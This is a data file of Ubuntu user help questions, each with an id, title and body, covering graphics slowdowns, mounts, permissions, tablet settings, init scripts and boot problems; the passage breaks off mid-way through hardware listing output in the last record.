487476	ubuntu dead slow after last update	it 's been a few days now . everything is slow as hell . going from a desktop to the next is slow . unlocking my workstation kind of fades out the lock screen and fades in the desktop . the animation takes about 5 seconds ! any popup or window moving pegs a core for 1-2 seconds and is barely useable . scrolling in firefox is almost not working anymore , in chrome it is a little better . opening an image from my camera ( 18mpix with the default image viewer ) freezes my system for seconds ... but the worst is videos : i can not play any video full screen anymore with mplayer - my player of choice . vlc seems to be able to do better but i 'm not seeing 30fps , everything stutters . this all worked fine a couple of weeks ago . my gc is an old ati ( radeon hd 4350/4550 ) and from what i 've gathered it might be the problem ... is there a solution short of reinstalling my system with 13.10 ? or switching to windows because i 'm tired of reinstalling my os all the time ... i 've got a q6600 ( quad core ) with 8gb of ram .
487477	share home and ntfs folder in dropbox between ubuntu machines	i have a working ubuntu 12.04 in a dual-boot with windows vista and in separate partition i have installed ubuntu 14.04 to test and slowly replace 12.04 . in existing 12.04 installation i am syncing with dropbox the following folders : /home/documents /media/123 ... abc/users/user/example the latter ntfs share ( /media/123 ... abc/ ) is mounted via fstab in both 12.04 and 14.04 installations : uuid=123 ... abc /media/123 ... abc ntfs 0 0 is there a way to keep updated these two folders in 2 ubuntu installations with dropbox ? ntfs partition is not synced from dropbox in windows .
487478	install ubuntu alongside windows 8.1 with only one drive	i 'm new to all of this ubuntu and i want to install it on my laptop , but i was wondering if having only on drive ( c drive ) would require me to delete windows first , while running the ubuntu installer it did n't detect windows so i do n't know what to do , thanks in advance for any help provided .
487480	how to prevent session lost in xubuntu ?	i have xubuntu 14.04 . every time my montor is locked down due to inactivity , my current session is getting lost as if i am logging out . i was downloading a file from internet . and after specific amount of time , my monitor got locked . when i unlocked the monitor , i found that new session has begun as if i am logging into new session . please help on how to prevent from logging out / session loss .
487481	wireless internet connection randomly disconnects in dell inspiron n5110	wireless connection goes off randomly . i also have a windows 7 installed along with ubuntu . i did n't install any extra drivers for it . it works sometimes . i have ubuntu 12.04 installed .
487482	can nautilus open two ssh connections simultaneously ?	i am using nautilus to connect to two remote servers ( a and b ) via ssh protocol . i can connect to a single server by opening the file > connect to server dialog . i enter my details and everything connects nicely . i can access the server files by clicking on sftp for xxx on a under the network location in the left sidebar on nautilus . however , when i connect to b ( while already connected toa ) , i lose my connection to a and can no longer browse the server , although i successfully connect to b . what is odd is that both locations a and b appear under network in the left sidebar , but only b can actually be opened , while server a turns grey upon opening . does nautilus support ssh to two servers simultaneously ?
487486	very slow boot due 11 second delay in remounting my root partition	i am using ubuntugnome 14.04 . i have very slow boot , mainly due to this step [ 4.021460 ] ext4-fs ( sdb3 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 15.774680 ] ext4-fs ( sdb3 ) : re-mounted . opts : errors=remount-ro ( sdb3 is my root ) i have tried all steps in this thread - very slow boot due to mounting filesytem i have also run fsck to find everything is fine and also tried e4rat from here- http : //www.howtogeek.com/69753/how-to-cut-your-linux-pcs-boot-time-in-half-with-e4rat/ nothing is working for me . guys please help me and my bootchart http : //i57.tinypic.com/2vb795h.jpg
487488	how to open chromium in full screen kiosk mode in minimal windows manager environment ( like openbox / jwm )	i am trying to set up a simple ubuntu kiosk box ( 14.04 ) , running only a chromium in a very minimal windows manager environment . steps i 've successfully done : login automatically : exec /bin/login -f kiosk_user < /dev/tty1 > /dev/tty1 2 > & 1 in /etc/init/tty1.conf start x environment ( startx in .profile ) start chromium in x environment in .xinitrc start windows manager ( tried fluxbox , jwm and openbox so far ) in .xinitrc what i currently have is chromium starting properly but in semi-normal mode . i need to explitly press f11 from the keyboard to make chromium to switch to the full screen and kiosk mode . one fellow chromium user from a mailing list said that this would work fine in full gnome environment without any tricks ( even xdotool ) - so this might be somehow related to these minimal windows managers . i did even try to start chromium itself without any windows manager ( chromium has something called aura , its own wm for chromiumos ? ) . in this mode , i could not get the chromium to fill the whole screen . this method is not preferrable either as there is no possibility to open other applications easily for example for troubleshooting purposes . .xinitrc # ! /bin/sh rm ~/tmp/ -rf xset s off xset dpms 600 60 60 xset +fp `` $ x_fontpath '' xset fp rehash env > ~/.xenv # run chromium start ~/start_chromium.sh & # run window manager exec openbox start_chromium.sh # ! /bin/sh set -e chromium_temp=~/tmp/chromium rm -rf ~/.config/chromium/ rm -rf $ chromium_temp mkdir -p $ chromium_temp chromium-browser \ -- disable \ -- disable-translate \ -- disable-infobars \ -- disable-suggestions-service \ -- disable-save-password-bubble \ -- disk-cache-dir= $ chromium_temp/cache/ \ -- user-data-dir= $ chromium_temp/user_data/ \ -- start-maximized \ -- kiosk `` file : ///home/kioskuser/kiosk.html '' & sleep 5 xdotool search -- sync -- onlyvisible -- class `` chromium '' key f11
487490	wacom intuos5 disable touch by default	how do i disable the touch usage on my tablet by default when i plug it in . normally when i plug it in i open a terminal type `` xinput '' get the id which has been id=18 and id=23 , it changes . then `` xinput disable id '' . i would like my to have this off by default as i simply do not use the touch interface .
487493	fan is always running ( cpu )	hp mini 1000 using gnome shell 3.4.x when i installed this os the fan did not always run and it seems after updating now the fan has and is always running ... whether plugged in or not ... now its just constantly on there are no processes running . no apps . and cpu usage is 5 % tried many other posts for answers and nothing works
487494	why is the menu bar showing in the window ?	i have ubuntu 12.04 and i noticed that when i use unity i can see the menu bar integrated in the window . usually it dose not show . but i can see the menu bar . the picture will describe what i 'm trying to say :
487496	terminal command to record video	i have cheese software in order to record a video and also take a picture from my laptop camera . but when you open that . you should do two thing : 1.select video recording among its default taking photo option ) 2. start to play ( start to record ) i need a command line when you put it on the terminal . cheese start to recording video without any other mouse click .
487501	echo script arguments from function	i need to get script arguments within function with arguments . ./myscript 1 2 3 function_name ( ) { if [ $ 1 == 3 ] ; then # i need the $ 1 in the following echo to be the script argument , not the function argument echo $ 1 $ 2 $ 3 fi } function_name $ #
487503	asus 1001pxd and ubuntu 14.04	there is a web site that contains information about ubuntu 12.04 suits very well with the asus eee pc 1001pxd model . i 'd like to ask anybody used 14.04 with that model of asus . here is the link http : //www.ubuntu.com/certification/hardware/201202-10627/ i wonder if ubuntu 14.04 trusty 64 bit fully supports asus eeepc 1001pxd . thanks .
487504	update indicator label in c #	i 've created a new indicator : indicator = new applicationindicator ( `` sample-application '' , //id of the the indicator icon `` app-icon '' , //file name of the icon ( will look for app-icon.png ) category.applicationstatus , executablefolder //the folder where to look for app-icon.png ) ; //build popup menu for applicationindicator menu popupmenu = new menu ( ) ; indicator.label = `` init label '' ; ... from a timer callback , function i want to update the indicator 's label : indicator.label = `` new label '' ; the new label value is not applied to the indicator . it still shows the init label string .
487506	ubuntu 14.04 keeps asking for passphrase when ssh	i have ubuntu 14.04 workstation installed in my lab . now i have issue with rsa key passphrase . following are what i have in my lab svn server ( 12.04 ) : i have svn server installed , anyone who want to access svn must have their key in authorized_keys file of svn server . home server ( 12.04 ) : it 's mounted as /home on clients ubuntu desktop 12.04 : there are more than 5 clients connected to my ubuntu lab ( using for many years ) ubuntu desktop 14.04 : i have just installed 14.04 version for test this my issue , from ubuntu desktop 12.04 it does n't ask for passphrase but ubuntu 14.04 does . it keeps asking for passphrase everytime i use svn command . i tried recreated rsa key but it does n't work . i test created key without passphrase , it does n't ask me to enter passphrase . and it is n't what i want because unsecured . any ideas ?
487507	give permission to a specific group without owning it	i have created a group named newgroup . but i did n't add my user to this group . now i want give the write permission to this group for a specific file named sample.txt . i can use chmod if i am the member of this newgroup . can i do this using sudo ? how ? i created this group using the following command sudo groupadd newgroup
487512	ubuntu 14.04 opencl and ati/intel graphic	i 'm wondering if following is possible : i have two graphics cards - ati and intel , and installed fglrx driver . in amdcccle i have enabled intel card . i 'm developing opencv application where i have many computations so i decided to use opencl ( opencv has ability to use opencl ) . but is it possible to use ati card with opencl while intel is enabled in amdcccle ? i have tried to use ati when intel is enabled but opencl ati gpu adapter is n't detected . but lspci still shows ati card so maybe it is possible .
487513	qt c++ windowminimized no reaction on ubuntu	heloo all ! me and a friend are creating an app for linux , everyting works but the custom minimize button doesnt whant to work on ubunutu 14.04 , there is no reaction when presed clicked an so on . any idea ? this is the code asigned to the button void mainwindow : :on_buttonminimize_clicked ( ) { this- > setwindowstate ( qt : :windowminimized ) ; } here is the app if you what to give it a try https : //github.com/micku7zu/qtonefm ps : some peaple have tested the app in arch xfce an the minimize button works .
487514	flashplaver for ubuntu 14.04	i 'm trying to install the flashplayer plugin in the three steps shown on http : //www.itworld.com/software/415657/install-adobe-flash-plugin-ubuntu-1404 but get the following message : package adobe-flashplugin is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source . e : package 'adobe-flashplugin ' has no installation cadidate . i 'm a total noobie when it comes to linux , and i did n't bother at all with the dos when using windows os , so what does this exactly mean ? can i install flash from somewhere else ? jannike
487517	option `env_reset ' does not take a value	this is a problem has bothered me for a long time . when i tried to set proxy for apt-get command , i found a manual in the net . it said that use visudo to edit sudoers file could set proxy for add-apt-repository . # sudo visudo defaults env_keep= '' http_proxy '' defaults env_keep= '' https_proxy '' just like above . i think i commented out the 'env_reset ' option by mistake , so i can not use apt-get and other commands need root password . of course , i can not use visudo to edit sudoers again ... .is there any other way can set sudoers to the default ?
487520	failed to fetch	am getting this error when am trying to update using t command sudo apt-get update & & sudo apt-get upgrade fetched 1,338 kb in 38s ( 34.9 kb/s ) w : http : //ppa.launchpad.net/ffmulticonverter/stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ffmulticonverter/stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found
487522	how to make gedit a java ide	im looking for a lightweight ide . i 've heard that gedit can also be used for this purpose . can anyone tell me how to make it a java ide , i have n't come across anything helpful yet . in tools > manage external tools ive created a new tool called java compile and run ( shortcut set to ctrl + f5 ) . in the edit section , there is a code and the language is set to java . when i press ctrl + f5 , it gives this error : running tool : java compile and run javac : directory not found : ../class usage : javac < options > < source files > use -help for a list of possible options done . code in edit section : # ! /bin/sh if javac -d '../class ' -classpath '../class ' $ gedit_current_document_path then gnome-terminal -- working- directory= $ gedit_current_document_dir -x sh -c `` java -classpath '../class ' $ { gedit_current_document_name % \ . * } ; echo '\n\npress any key to end output ' ; read temp '' fi
487524	is ubuntu an x11 display itself ?	is using an ubuntu eventually using an x11 display ? i see that with env | grep display i get display=:0.0 so dose this mean that ubuntu itself is another extension of x11 ?
487525	external disk mount again after safe removal	i have an external ntfs disk . when i try to safe remove it , after few seconds it is mounted again without doing nothing ... this happens every time and with every remove method i tried : clicking on `` safe remove '' on nautilus clicking first `` umount '' and then `` safe remove '' on nautilus from terminal using sudo udisks -- unmount followed by sudo udisks -- detach how can i safe remove the disk ? if i disconnect the disk after unmounting it but without safe removal ( the light on the disk is still on ) the disk can be damaged ?
487527	give specific user permission to write to a folder using +w notation	i know i can assign the permission to write to an owner\group\others like this : chmod u+w myfolder can i specify the specific user here ? some like this : chmod username u+w myfolder
487529	switching from windows 7 to ubuntu 13.10 my wifi router	i am switching from windows 7 to ubuntu 13.10 and i burned ubuntu on dvd and inserted and chose option 2 to install ubuntu only and delete win7 and anything else . my problem is that i have wifi router that gives me internet and i set it up on windows 7 with a password . my question is when i install ubuntu 13.10 and remove win7 will there be a problem with this router ? what should i do to set it up on ubuntu ? will the old password work with ubuntu ?
487530	lubuntu does n't write `` í '' caracter	i 'm not able to write `` í '' character anymore . i 'm using lubunut ( ubunut 14.04 , lxde ) . i have a dell sk-8115 keyboard whit hungarian layout . the `` í '' character is worked fine util that i configureted the keyboard layout handler , because i need to use more keyboard layouts . ( currently i 'm useing hungarian , italian , greek and armenian layouts . ) i tried to resolve whit the help of this topic : apple alu keyboard hungarian layout 0 and í swapped , but i do n't have the ~/.xmodmap , and i think this is n't the way to solve my problem . after that i tried this : https : //help.ubuntu.com/community/applekeyboard # correcting_swapped_keys_and_wrong_keymaps_for_international_.28non-us.29_keyboards but for $ echo 0 | sudo tee /sys/module/hid_apple/parameters/iso_layouti recived the next message : tee : /sys/module/hid_apple/parameters/iso_layout : no such file or directory 0 after that i tried to created /etc/modprobe.d/hid_apple.conf whit the text indicated in the link , but after $ sudo update-initramfs -u -k all i recived infinity time this message : libkmod : error ../libkmod/libkmod-config.c:686 kmod_config_parse : /etc/modprobe.d/hid_apple.conf line 1 : ignoring bad line starting with 'echo' what should i do ? thank you for your responses .
487531	a browser which allows to manually change margins while printing	what i want i have filled a online form for admission . i need to take print of it to a file , but there are certain conditions . there should be no header or footer page should be a4 sized . all 4 margins ( i.e top , bottom , left and right ) should be 0.25 what i tried while using print to file option in firefox , i can fulfill first 2 prerequisites but the margin is always 0.5 . i went to about : config and changed the advanced settings as printer_print_to_file.print_margin_bottom ; 0.25 printer_print_to_file.print_margin_left ; 0.25 printer_print_to_file.print_margin_right ; 0.25 printer_print_to_file.print_margin_top ; 0.25 still i get 0.5 margin while printing . then i tried chromium browser . here too i can fulfill first 2 prerequisites but margin is set to 0.4 . i googled but did not find a solution to change it to 0.25 what i ask so i want you to either provide a way by which i could change the margins to 0.25 in one of the above browsers , or provide some browser where i could fulfill all 3 prerequisites of course i use ubuntu .
487533	how can i remove one of the two ubuntu operating systems from my computer ?	currently i have two ubuntu 14.04 oss installed on my computer , and i want to remove one of them . how can i do that ? please explain it to me in detail . i do not want to save the data of unwanted os . thanks in advance .
487538	run apache 2.2 and apache 2.4 locally in ubuntu 12.04	i 'd like to have both apache2.2 ( already installed ) and apache2.4 ( to be installed ) locally . how can i do that ? how should i switch between servers ? just shutting down one them and starting the other would suffice ? thanks !
487540	is there any way to make the ubuntu dash a 'start-up application ' ?	my desktop is pretty blank and i 'd much rather have the useful dash come up on start-up , is this possible ? surely there is a command that is executed internally when i press the dash home button ? what is this ?
487541	want to use ubuntu desktop os on a server providing ubuntu use just by login ?	to ubuntu team i would like to provide ubuntu desktop os directly in the browser , if this is not possible i will find an alternate way of doing it . as students in india are using less ubuntu i want to encourage the habit of using ubuntu in their routine . free ubuntu dvds were given but few students really tried it and are not using it unless it is compulsory . my only question is : am i ( legally ) allowed to try to do it ?
487542	how to customize top panel ? ubuntu 14.04 unity	i 'm looking for a way to move some of the `` stuff '' on the top panel from the right corner to the center . it 's a little frustrating thing to look at the time in the corner , when i can possibly just look up to the middle of panel . anyone got any idea how to do it ?
487544	how to remove a repository added by ppa ?	i run this command : sudo add-apt-repository ppa : < repo > how can i remove the now ? becaus when i run update it says that its index has failed to be downloaded .
487547	init script of debian package not working correcly in different computers in ubuntu 12.04	i created a debian single binary package ( .deb ) for a software project to install the application as a service in ubuntu . dpkg -- install package installation is successful in the computer i used to create the .deb package but i tried with different pc with same environment ( all dependencies are installed in these 2 pcs ) installation was success and all files installed to correct file locations . i triggered service servicename start to start the service . service successfully started but process is stopping instantly ( log message show 0xff signal received ) . i tried to start the process using the installed binary file in installation location ( /opt/xxxx/bin directory ) then process working properly . below is the init script ( the script place to /etc/init.d/ directory ) and is this a problem with the init script ? summary of steps create debian package ( used dh_make , dpkg-buildpackage -rfakeroot related commands ) install in the same pc , installation success and service start-run-stop correctly try in different pc , installation success , service started but stop instantly . below is the init script # ! /bin/bash # cscore daemon # chkconfig : 345 20 80 # description : daemon service ( cscore ) for cscore ubuntu 12.04 # processname : cscore daemon_path= '' /opt/xxx/bin '' daemon=cscore name=cscore desc= '' daemon service ( cscore ) for corescanner in ubuntu 12.04 '' pidfile=/var/run/ $ name.pid scriptname=/etc/init.d/ $ name case `` $ 1 '' in start ) printf `` % -50s '' `` starting $ name ... '' cd $ daemon_path pid=` $ daemon > /dev/null 2 > & 1 & echo $ ! ` # echo `` saving pid '' $ pid `` to `` $ pidfile if [ -z $ pid ] ; then printf `` % s\n '' `` fail '' else echo $ pid > $ pidfile printf `` % s\n '' `` ok '' fi ; ; status ) printf `` % -50s '' `` checking $ name ... '' if [ -f $ pidfile ] ; then pid=`cat $ pidfile` if [ -z `` `ps axf | grep $ { pid } | grep -v grep` '' ] ; then printf `` % s\n '' `` process dead but pidfile exists '' else echo `` running '' fi else printf `` % s\n '' `` service not running '' fi ; ; stop ) printf `` % -50s '' `` stopping $ name '' pid=`cat $ pidfile` cd $ daemon_path if [ -f $ pidfile ] ; then kill -hup $ pid printf `` % s\n '' `` ok '' rm -f $ pidfile else printf `` % s\n '' `` pidfile not found '' fi ; ; restart ) $ 0 stop $ 0 start ; ; * ) echo `` usage : $ 0 { status|start|stop|restart } '' exit 1 esac
487549	unable to add nodes to ubuntu maas server on static vlan	i 'm trying to setup the private cloud in my data center but having problem . i 've many servers with good configuration to test with . all the servers are connected to many switches on a vlan with static ip . i 've installed maas on one machine with ip address as 10.128.89.209 and created an account for maas . i imported boot images successfully . i tried to install new node using disk by giving ip address as 10.128.89.210 and gateway as 10.128.89.1 but it did n't detect the maas automatically so i choose the option to specify maas by hostname or ip , and then i entered ip i.e . 10.128.89.209 . after entering ip the server gets power off . i 've also tried to add node from maas web interface by giving mac address but that only shows the status as commissioning . i 'm not able to resolve it or i 'm missing something ?
487554	using backticks or dollar in shell scripts	i 'm busy writting shell script ( using bash ) where i need to populate some variable from the returned result of other command . so i 'm using a syntax like this one : var=`command 2 > /dev/null` but when looking for information on script shells , i found often that the above can be achieved by using the following syntax too : var= $ ( command 2 > /dev/null ) both are working for me ( i have received the expected result in both case ) and i 'm thus wondering if i can still use both form interchangeably or if i have to stick to one form to be sure to stay compliant with the future evolution of shell ?
487558	how to test if the apt cache is up to date with bash	i 'm searching a way to test in a bash script if a cache update is needed ( to avoid unnecessary apt-get update when the apt-cache have been updated recently ) . can someone help me ?
487559	bind alt + left/right arrow to home and end keys in xkb	i have tried a few ways to achieve this but none of them seemed to work , autokey inserts both the alt + right and end keys in applications . i am looking for a solution in xkb where i have already done a few changes , i want the alt behaviour of the left and right arrows to be mapped to home and end .
487562	ubuntu not booting after system update but	the massive but ! - it will boot with a ubuntu cd in the drive , but boots to the regular install of ubuntu not the live cd . very weird , i 'm dual booting windows 8 and ubuntu 12.04 on an asus x550c last night several updates ran and upon rebooting ubuntu gets to just past the grub loader and stops there , on the dark red screen but before the ubuntu name is shown . i tried boot repair and it has n't worked for me . i tried going into the computer bios to set booting to cd but it 's not an option in the boot menu anymore . boot repair put this up - http : //paste.ubuntu.com/7694285/ any help would be massively appreciated edit - i checked gparted after reading this the boot files of [ the os now in use - ubuntu 12.04.4 lts ] are far from the start of the > disk . your bios may not detect them . you may want to retry after creating a /boot > partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as > gparted . then select this partition via the [ separate /boot partition : ] option of [ boot > repair ] . ( https : //help.ubuntu.com/community/bootpartition ) but it shows the boot partition at the start of the disk . update - in reply to the question '' what happens if you boot an old kernel '' - same result
487564	luks disk encryption	i have setup disk encryption with 'luks ' and configure it to auto mount when the system boots up . so now as it supposed , it prompts me a passphrase when the system boots up . if i enter the correct passphrase it continuous the system . so in some cases i want to escape from typing passphrase . is there a way to do that . ?
487565	how to reinstall ubuntu from dell bios revision a10	i got a dell latitude d620 for free recently and the person who gave it to me had ubuntu 12.04 loaded on it . while updating the update software removed `` unessential '' packages . now when i try to boot the screen will display the ubuntu logo and loading sign for a second or 2 and then go black until we pull out the battery . i gave it 12 hours overnight and about 10 hours during the day . if i use the boot setup software , i will see that there are 3 non recovery mode ubuntu versions and three recovery versions . one recovery mode version will run command line linux only . i am unfamiliar with linux so i need the graphical user interface . i have made no mods to the os or the laptop . i do not think that the guy before me had made any mods either . this computer use to be a windows corporate machine .
487570	disable touch of the tablet in ubuntu unity 14.04	i 've searched beforehand and the only suggestion i 've found is this one but it does n't work , at least not on my system ( ubuntu unity 14.04 x64 ) . i need to disable the touch on my wacom bamboo manga cth-470 tablet so only the pen tip and eraser are recognized and not my hand when i accidentally touch it . i know of this temporary solution : xsetwacom -- list to list the output of the tablet ( example ) inoki @ innerdistance-satellite-l650 : ~ $ xsetwacom -- list wacom bamboo 16fg 4x5 pen stylus id : 11 type : stylus wacom bamboo 16fg 4x5 finger touch id : 12 type : touch wacom bamboo 16fg 4x5 pen eraser id : 16 type : eraser wacom bamboo 16fg 4x5 finger pad id : 17 type : pad then xsetwacom -- set # touch off using inoki @ innerdistance-satellite-l650 : ~ $ xsetwacom -- list | grep touch | cut -d ' ' -f 8 touch inoki @ innerdistance-satellite-l650 : ~ $ has shown only the `` touch '' word exactly as above . i need to make it permanent , so i do n't have to insert the command every time i want to work with my tablet .
487571	can not login after clam av removal purge mistake	i would like some help repairing my ubuntu installation please , i am having problems logging in after a mistake trying to uninstall clam av . i accidentally deleted some files / libraries whilst trying to remove clam av and tk . clamav was n't working properly , when i scanned it reported that it found a virus but it did n't remove it or update definitions . also clam tk kept displaying error messages that the gui was out of date but again would n't update . i tried various ways to update both and in the end decided to uninstall both and start from scratch . without thinking , i typed sudo apt-get purge clam* into terminal which then proceeded to remove loads of other libraries as well as clam av . now i can not login to the desktop ; the system boots to the login screen and when i enter username & pw , a message is displayed saying `` failed to load session ubuntu '' and [ logout ] button , which takes me back to the login screen again . i can get into a terminal session with ctrl+alt+f1 , but i am not familiar enough with the system commands to repair it from there : sudo apt-get update displays a few errors against some of the sources and a `` failed to fetch ppa.launchpad * precise 404 not found '' at the end . thus i can not upgrade either . i have tried to reverse the removal with sudo apt-get install clam* , which initially looks like it is working as it selects all the removed packages , but then it shows an error message for each ( depends on * ) and a final one stating : `` unable to correct , you have held broken packages '' . sudo apt-get install ubuntu-desktop does n't work either , just shows lots of error messages , and packages with unmet dependencies : checkbox-gt , unity-2d , cups-bsd , qt-at-spi , sni-qt and the final `` held broken packages '' message , as above . i tried to install these seperately but thet also have dependencies which are n't present . i do n't really want to uninstall due to loads of system changes and tweaks which would be difficult to do again , any help would be greatly appreciated . i am running ubuntu 12.04 on an hp pavillion tx2500 laptop .
487573	mountall error message with mhddfs	i have installed ubuntu 14.04 on an ssd , and want to setup my /tmp using mhddfs to join a small tmpfs and an hdd partition . i have managed to get the /etc/fstab looking ok , and the boot runs ok ( no mount errors to skip ) , and the directories appear to look as if this is working - prior to boot the / mount points are ( seen as mounted to another ubuntu image ) - drwxrwxrwt 2 root root 4096 jun 23 16:39 tmp drwxrwxrwt 2 root root 4096 jun 23 15:45 tmp-hdd drwxrwxrwt 2 root root 4096 jun 19 16:06 tmp-ram these are all empty . there is a separate hdd partition that gets mounted to /tmp-hdd , this contains - drwxrwxrwt 3 root root 4096 jun 23 15:44 . drwxr-xr-x 9 root root 4096 jun 23 17:36 .. drwxrwxrwx 2 root root 4096 jun 23 12:51 firefox-cache /etc/fstab looks like this - # /tmp on ram+hdd : # * hdd = > cap1-hdd1 uuid=221181b3-f65c-4382-92a8-d5f88ca50854 /tmp-hdd ext4 showthrough , bootwait 0 2 # * ram = > tmpfs /tmp-ram tmpfs defaults , noatime , size=200m , mode=1777 , showthrough , b ootwait 0 0 # * unionfs = > mhddfs # /tmp-ram , /tmp-hdd /tmp fuse defaults , allow_other , mlimit=100m , nonempty , showthro ugh , bootwait 0 0 # # / was on /dev/sdc1 during installation uuid=58f05a4a-8647-46be-96f3-5b44080abf72 / ext4 noatime , errors=remount-ro , bootwait 0 1 i have done this with showthrough etc , as /tmp seemed sensitive to being mounted after / - things seem to start to use /tmp very early on ... when booted up , /tmp looks like this - total 24 drwxrwxrwt 5 root root 180 jun 23 17:47 . drwxr-xr-x 26 root root 4096 jun 23 16:38 .. drwxrwxrwx 2 root root 4096 jun 23 12:51 firefox-cache -rw -- -- -- - 1 ian ian 8192 jun 23 17:46 .fuse_hidden000000210000000a drwxrwxrwt 2 root root 60 jun 23 17:46 .ice-unix drwx -- -- -- 2 ian ian 60 jun 23 17:46 ssh-xxxxxxxxxxxx -rw-r -- r -- 1 ian ian 0 jun 23 17:46 unity_support_test.0 -rw-r -- r -- 1 nut nut 101 jun 23 17:45 ups_state.log -r -- r -- r -- 1 root root 11 jun 23 17:45 .x0-lock drwxrwxrwt 2 root root 60 jun 23 17:45 .x11-unix most of this is in /tmp-ram - total 20 drwxrwxrwt 5 root root 180 jun 23 17:47 . drwxr-xr-x 26 root root 4096 jun 23 16:38 .. -rw -- -- -- - 1 ian ian 8192 jun 23 17:46 .fuse_hidden000000210000000a drwxrwxrwt 2 root root 60 jun 23 17:46 .ice-unix drwx -- -- -- 2 ian ian 60 jun 23 17:46 ssh-xxxxxxxxxxxx -rw-r -- r -- 1 ian ian 0 jun 23 17:46 unity_support_test.0 -rw-r -- r -- 1 nut nut 101 jun 23 17:45 ups_state.log -r -- r -- r -- 1 root root 11 jun 23 17:45 .x0-lock drwxrwxrwt 2 root root 60 jun 23 17:45 .x11-unix and /tmp-hdd has - total 12 drwxrwxrwt 3 root root 4096 jun 23 15:44 . drwxr-xr-x 26 root root 4096 jun 23 16:38 .. drwxrwxrwx 2 root root 4096 jun 23 12:51 firefox-cache that all looks good to me , but this looks odd - /var/log/upstart/mountall.log conains and error - ( see this below : `` mountall : mount /tmp [ 411 ] terminated with status 255 '' ) fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 mhddfs : directory '/tmp-ram ' added to list mhddfs : directory '/tmp-hdd ' added to list mhddfs : mount to : /tmp mhddfs : move size limit 104857600 bytes /dev/sdc1 : clean , 249353/3301376 files , 1588452/13187988 blocks multi-hdd fuse filesystem copyright ( c ) 2008 , dmitry e. oboukhov < dimka @ avanto.org > usage : mhddfs dir1 , dir2.. mountpoint [ -o options ] options : mlimit=xxx - limit of the disk free space ( if the disk has the free space more than specified - it is considered as the empty one ) . default is 4gb , but 100mb at least . logfile=/path/to/file - path to a file where the logs will be stored . loglevel=x - level for log-messages : 0 - debug 1 - info 2 - default messages see fusermount ( 1 ) for information about other options mountall : mount /tmp [ 411 ] terminated with status 255 var-log : clean , 124/1281120 files , 127101/5120000 blocks cap1-hdd1 : clean , 11/15933440 files , 1047876/63730944 blocks and i do not see /tmp mentioned in the output of mount - /dev/sdc1 on / type ext4 ( rw , noatime , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) tmpfs on /tmp-ram type tmpfs ( rw , noatime , size=200m , mode=1777 ) /dev/sda7 on /var/log type ext4 ( rw , errors=remount-ro ) /dev/sda8 on /tmp-hdd type ext4 ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ian ) gvfsd-fuse on /root/.gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev ) it seems to be working - but i do n't like to see error messages from mountall that could indicate all is not well , and something is broken ... ps . i have tried adding a `` logfile=xxx '' option to /etc/fstab , but everything is read-only at that stage , so the mount for /tmp fails totally ... pps - i would have added tags to this entry for `` mhddfs '' and `` mountall '' , but the system seems overly protactive ...
487575	how can i recover trusted.gpg.d ?	i run sudo rm /etc/apt/trusted.gpg.d/ -r by mistake . how can i recover this important folder ( i can no longer update )
487577	ubuntu server 14.04 cant read dvds , cds	i 'm having trouble reading any cds or dvds . eject command works and the drive will spin but the media/cdrom file is always empty after trying multiple data dvds . i also wanted to try and reinstall ubuntu all together but now i can not as it will only boot from the hdd and not disc . even if i pull the hard drives nothing happens it will just wait . i 'm assuming its not a bad dvd drive as well as this is the second system ive tried this on with a entirely different dvd drive but having the same issue . any help would be appreciated .
487578	battery indicator missing if i insert battery while the laptop is turned off or in sleep	battery indicator is missing if i insert battery while the laptop is turned off . i 'm using official ubuntu 14.04 with unity desktop . in system settings , the option `` when the battery is present '' is chosen for the `` show battery in the status bar '' . if i insert the battery while the laptop is on , it works . on 13.10 , it worked . i clean installed 14.04 . any ideas ? edit1 : here 's the output of ps ax | grep indicator-power-service : 2709 ? ssl 0:00 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service 12133 pts/1 s+ 0:00 grep -- color=auto indicator-power-service edit2 : here 's an output of upower -- dump . the laptop is on battery and unplugged , but there 's no battery indicator : device : /org/freedesktop/upower/devices/line_power_ac0 native-path : ac0 power supply : yes updated : понедељак , 14. јул 2014 . 10:54:51 cest ( 2631 seconds ago ) has history : no has statistics : no line-power online : no daemon : daemon-version : 0.9.23 can-suspend : yes can-hibernate : yes on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no edit3 : here 's output of sudo lshw -sanitize . i did this while the indicator was working , and the computer was plugged in . thanks ! computer description : notebook product : k55a ( asus-notebooksku ) vendor : asustek computer inc. version : 1.0 serial : [ removed ] width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall32 configuration : boot=normal chassis=notebook family=k sku=asus-notebooksku uuid= [ removed ] *-core description : motherboard product : k55a vendor : asustek computer inc. physical id : 0 version : 1.0 serial : [ removed ] slot : middle *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : k55a.407 date : 12/25/2012 size : 64kib capacity : 6080kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb smartbattery biosbootspecification uefi *-cache:0 description : l2 cache physical id : 8 slot : cpu internal l2 size : 